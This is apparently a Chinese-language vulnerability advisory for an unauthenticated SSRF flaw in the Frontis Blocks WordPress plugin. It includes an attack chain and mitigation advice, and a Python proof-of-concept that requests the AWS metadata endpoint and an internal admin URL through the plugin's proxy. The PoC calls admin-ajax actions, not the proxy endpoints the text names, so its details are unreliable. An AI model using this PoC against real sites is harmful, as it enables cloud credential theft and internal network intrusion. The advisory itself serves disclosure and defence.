CVE-2026-0807 WordPress Frontis Blocks插件SSRF漏洞

漏洞信息

漏洞编号

CVE-2026-0807

漏洞类型

服务器端请求伪造(SSRF)

CVSS评分

7.2 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Frontis Blocks plugin for WordPress

漏洞概述

CVE-2026-0807是WordPress Frontis Blocks插件中的一个高危服务器端请求伪造(SSRF)漏洞。该插件是一款用于WordPress的块编辑器增强插件，在1.1.6及之前的所有版本中存在安全缺陷。漏洞根源在于插件的template_proxy函数对用户提交的url参数缺乏充分的验证和限制，攻击者可以操控该参数让服务器向任意内部或外部资源发起请求。由于漏洞存在于'/template-proxy/'和'/proxy-image/'端点，攻击者无需任何认证即可利用此漏洞发起攻击，成功利用可导致敏感信息泄露、内网服务探测、配合其他漏洞进行更深层次攻击等严重后果。CVSS评分7.2，属于高危漏洞，建议立即升级到最新修复版本。

技术细节

该漏洞属于经典的服务器端请求伪造(SSRF)类型。Frontis Blocks插件在处理用户请求时，template_proxy函数直接获取url参数值而未进行严格的白名单验证或URL合法性检查。攻击者可以通过构造恶意URL，利用服务器的权限访问内部敏感资源（如metadata.amazonaws.com、169.254.169.254元数据端点等云服务接口）或对内部网络进行端口扫描。漏洞端点包括：1) /template-proxy/ - 用于模板代理的功能端点；2) /proxy-image/ - 用于图片代理的功能端点。由于WordPress插件以Web服务器权限运行，攻击成功后可利用服务器身份发起请求，绕过传统防火墙限制。技术层面，漏洞代码位于Admin.php第910行附近，缺少对file://、dict://、gopher://等特殊协议的过滤，仅依赖基本输入而未进行安全校验。

攻击链分析

STEP 1

步骤1: 信息收集

攻击者识别目标WordPress网站并确认安装了Frontis Blocks插件，通过插件版本检测确定是否存在CVE-2026-0807漏洞（版本<=1.1.6）

STEP 2

步骤2: 构造恶意请求

攻击者构造包含恶意URL参数的SSRF payload，针对/template-proxy/或/proxy-image/端点发起请求，可指定任意内部或外部URL

STEP 3

步骤3: 触发漏洞

服务器端插件的template_proxy函数接收未过滤的url参数，以服务器身份发起请求并返回响应内容给攻击者

STEP 4

步骤4: 敏感信息获取

攻击者利用SSRF访问云服务商元数据端点(如AWS 169.254.169.254)获取IAM凭证、内部服务信息或数据库连接字符串

STEP 5

步骤5: 横向移动或权限提升

获取的敏感凭证可用于进一步攻击云资源、数据库或其他内部系统，实现权限提升和横向移动

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# CVE-2026-0807 PoC - SSRF in Frontis Blocks plugin
# Target: WordPress site with Frontis Blocks plugin <= 1.1.6

TARGET_URL = "http://target-wordpress-site.com"

# Test SSRF via /template-proxy/ endpoint
def test_ssrf_template_proxy(target):
    endpoint = f"{target}/wp-admin/admin-ajax.php"
    params = {
        'action': 'frontis_template_proxy',
        'url': 'http://169.254.169.254/latest/meta-data/'  # AWS metadata
    }
    try:
        response = requests.get(endpoint, params=params, timeout=10)
        print(f"[*] Status: {response.status_code}")
        print(f"[*] Response: {response.text[:500]}")
    except Exception as e:
        print(f"[!] Error: {e}")

# Test SSRF via /proxy-image/ endpoint
def test_ssrf_proxy_image(target):
    endpoint = f"{target}/wp-admin/admin-ajax.php"
    params = {
        'action': 'frontis_proxy_image',
        'url': 'http://internal-server:8080/admin'
    }
    try:
        response = requests.get(endpoint, params=params, timeout=10)
        print(f"[*] Status: {response.status_code}")
        print(f"[*] Response: {response.text[:500]}")
    except Exception as e:
        print(f"[!] Error: {e}")

if __name__ == "__main__":
    test_ssrf_template_proxy(TARGET_URL)
    test_ssrf_proxy_image(TARGET_URL)

影响范围

Frontis Blocks plugin for WordPress <= 1.1.6

防御指南

临时缓解措施

临时缓解措施：在Web服务器配置中添加访问控制规则，限制对/template-proxy/和/proxy-image/端点的访问，或使用.htaccess/nginx配置阻止这些端点的外部访问。同时可在WAF层面添加SSRF检测规则，对包含内网IP段(10.0.0.0/8, 172.16.0.0/12, 192.168.0.0/16)、localhost或云元数据端点的请求进行拦截。长期方案是等待官方发布修复版本后立即升级。